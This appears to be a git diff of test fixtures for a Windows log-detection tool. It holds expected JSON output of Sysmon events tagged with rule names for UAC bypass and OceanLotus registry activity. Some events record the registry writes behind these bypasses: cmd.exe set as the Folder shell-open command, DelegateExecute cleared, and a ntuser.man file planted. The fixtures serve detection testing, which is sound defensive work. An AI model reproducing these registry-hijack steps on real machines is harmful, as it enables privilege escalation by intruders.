(win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-79DF-5CD5-0000-0020F8410100","LogonId":"0x141f8","ParentCommandLine":"\"c:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-7D86-5CD5-0000-0010CC2E1400","ParentProcessId":2076,"ProcessGuid":"365ABB72-7DA9-5CD5-0000-00100ED31400","ProcessId":2524,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-10 13:33:29.409"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":15678,"Execution_attributes":{"ProcessID":1980,"ThreadID":1948},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-10T13:33:29.424885Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass Using Registry Shell Open Keys","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\Windows\\SysWOW64\\notepad.exe","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-9DB0-5D46-0000-00108243AF03","ProcessId":3580,"RuleName":"PrivEsc - UAC bypass UACME-45","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\exefile\\shell\\open\\command\\(Default)","UtcTime":"2019-08-04 08:56:16.635"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5664,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T08:56:16.650581Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.751","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man","UtcTime":"2020-08-25 10:08:05.751"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358988,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:05.763694Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.766","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man.LOG1","UtcTime":"2020-08-25 10:08:05.766"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358989,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:05.770148Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.766","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man.LOG2","UtcTime":"2020-08-25 10:08:05.766"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358990,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:05.772810Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.766","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf","UtcTime":"2020-08-25 10:08:05.766"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358991,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:05.776409Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.766","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms","UtcTime":"2020-08-25 10:08:05.766"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358992,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:05.780448Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.782","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms","UtcTime":"2020-08-25 10:08:05.782"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358993,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:05.787947Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359028,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.398014Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man.LOG1","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359030,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.401175Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man.LOG2","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359031,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.401210Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359032,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.401236Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359033,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.401303Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359036,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.418961Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.579","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.blf","UtcTime":"2020-08-25 10:08:37.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359040,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.594123Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.595","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.0.regtrans-ms","UtcTime":"2020-08-25 10:08:37.595"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359041,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.610172Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man","UtcTime":"2020-08-25 10:08:37.673"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359044,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.677776Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.673","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\AppData\\Local\\Microsoft\\CLR_v4.0","UtcTime":"2020-08-25 10:08:37.673"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359046,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.678592Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.673","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs","UtcTime":"2020-08-25 10:08:37.673"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359047,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.678627Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.673","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\TransactionLog.exe.log","UtcTime":"2020-08-25 10:08:37.673"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359048,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.678671Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"(Empty)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-A104-5D46-0000-0010C79CBC03","ProcessId":7312,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\Folder\\shell\\open\\command\\DelegateExecute","UtcTime":"2019-08-04 09:10:28.869"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5696,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T09:10:28.893194Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-A104-5D46-0000-001092A6BC03","ProcessId":2576,"RuleName":"PrivEsc - UAC bypass UACME-53","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\Folder\\shell\\open\\command\\(Default)","UtcTime":"2019-08-04 09:10:29.025"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5698,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T09:10:29.060588Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Sdclt Child Processes"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\control.exe\" /name Microsoft.BackupAndRestoreCenter","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Control Panel","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=391FF1F690C0912C217B3CF625900D4F50128867,MD5=88EA810385F455C74306D71C4879C61C,SHA256=4774A931C9D97828323C9E829917D82C27A05DAB9FEA6A0CEF9EBBA59942231F,IMPHASH=7A8EC2645C24D85DE8216D63022623C0","Image":"C:\\Windows\\System32\\control.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-56A3-5D45-0000-0020B3D31800","LogonId":"0x18d3b3","ParentCommandLine":"\"C:\\Windows\\system32\\sdclt.exe\" ","ParentImage":"C:\\Windows\\System32\\sdclt.exe","ParentProcessGuid":"747F3D96-A105-5D46-0000-00103BEBBC03","ParentProcessId":4532,"ProcessGuid":"747F3D96-A106-5D46-0000-00107201BD03","ProcessId":1380,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-04 09:10:30.346"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5702,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-04T09:10:30.752830Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}}] \ No newline at end of file diff --git a/e2e/search_expected.yml b/e2e/search_expected.yml index 78bf465..3c01842 100644 --- a/e2e/search_expected.yml +++ b/e2e/search_expected.yml @@ -1,7 +1,5 @@ --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Id: 400B6CF7-D355-4E0C-B9AE-4E8D8C8FF6A0 bytesTotal: 1317080 @@ -16,35 +14,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 3A7966F4-C627-4D9A-9BE6-0647DD61DB3A + Correlation_attributes: + ActivityID: 3A7966F4-C627-4D9A-9BE6-0647DD61DB3A EventID: 59 EventRecordID: 8199 - Execution: - "#attributes": - ProcessID: 4964 - ThreadID: 2612 + Execution_attributes: + ProcessID: 4964 + ThreadID: 2612 Keywords: "0x4000000000000000" Level: 4 Opcode: 1 